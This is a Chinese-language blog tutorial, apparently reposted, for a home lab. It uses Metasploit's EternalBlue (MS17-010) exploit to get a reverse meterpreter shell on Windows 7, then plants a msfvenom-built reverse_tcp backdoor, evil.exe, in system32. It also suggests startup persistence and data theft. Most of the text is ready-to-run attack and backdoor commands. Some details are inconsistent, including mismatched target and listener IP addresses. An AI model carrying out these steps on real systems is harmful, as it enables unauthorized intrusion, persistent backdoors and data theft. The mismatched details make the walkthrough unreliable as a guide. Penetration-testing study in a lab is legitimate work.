利用ms17-010 远程执行漏洞渗透Win7,并留下后门

  • 时间:
  • 来源:互联网
  • 文章标签:

一、环境准备

主机 kali :192.168.115.134

靶机win7x64:192.168.115.133

二、渗透

Metasploit 指令学习:https://blog.csdn.net/tan6600/article/details/46845793

这里利用的是win7的ms17-010 远程执行漏洞

先使用auxiliary/scanner/smb/smb_ms17_010这个模块进行漏洞的分析,看看这个445端口是否能被入侵

先show options查看这个模块的选项,在Required那列中,yes的是必填的,no是选填的,默认帮我们已经写好了大部分的参数,但我们还是要手动设置一下RHOSTS的参数,即指定的主机ip,这里我们写被攻击的win7的ip

set RHOSTS 192.168.115.113

接着输入run执行探测

显示表明可以利用该漏洞

开始使用攻击模块

msf > use exploit/windows/smb/ms17_010_eternalblue

msf > set payload windows/x64/meterpreter/reverse_tcp

msf exploit(ms17_010_eternalblue) > set lhost 192.168.115.134

lhost 192.168.115.134

msf exploit(ms17_010_eternalblue) > exploit

成功拿到shell

二、后门程序

1、用msfvenom生成后门程序

参考:https://blog.csdn.net/itest_2016/article/details/76984455

新版本的msf中已经由msfvenom取代了之前的msfpayload,所以这里我们用msfvenom来生成恶意文件。在/root下生成evil.exe文件。


msfvenom -pwindows/meterpreter/reverse_tcp lhost=192.168.17.26 lport=9999 -f exe > /root/evil.exe

 

生成结束之后我们需要把这个后门传递到被攻陷的目标主机,实际中可能是通过webshell、上传漏洞、先导马等等。传递到目标主机之后直接运行既可以得到一个meterpreter回话。这里我们获得了shell利用upload命令将文件传送到靶C:\windows\system32目录下。注意:目标路径要用\\。

可以看到靶机下已经接收到了后门程序文件。

此时需要现在攻击者的主机上启用监听,来接收来自后门的信息。

注意:我们要断开现在已有的连接

启动监听

msf > use exploit/multi/handler 
msf exploit(handler) > set lhost 192.168.115.134
msf exploit(handler) > set lport 9999
msf exploit(handler) > exploit 

被攻陷主机运行后门之后:

注意:可以将后门程序附加在开机启动项或者进程中,这里我们在靶机假装不知道它是后门程序双击启动evil.exe

监控端显示有一个连接

成功得到一个meterpreter会话。

这个时候攻击者就可以通过这个meterpreter来执行系统命令、提权、提取敏感数据、内网横向渗透等操作。(当然我都不会2333)

可以用一个有趣的

参考:https://blog.csdn.net/nzjdsds/article/details/77916706

通过

在/root/AzitvgoJ.jpeg下可以查看到靶机的屏幕截图

非常感谢!!!  

本文链接http://www.taodudu.cc/news/show-647719.html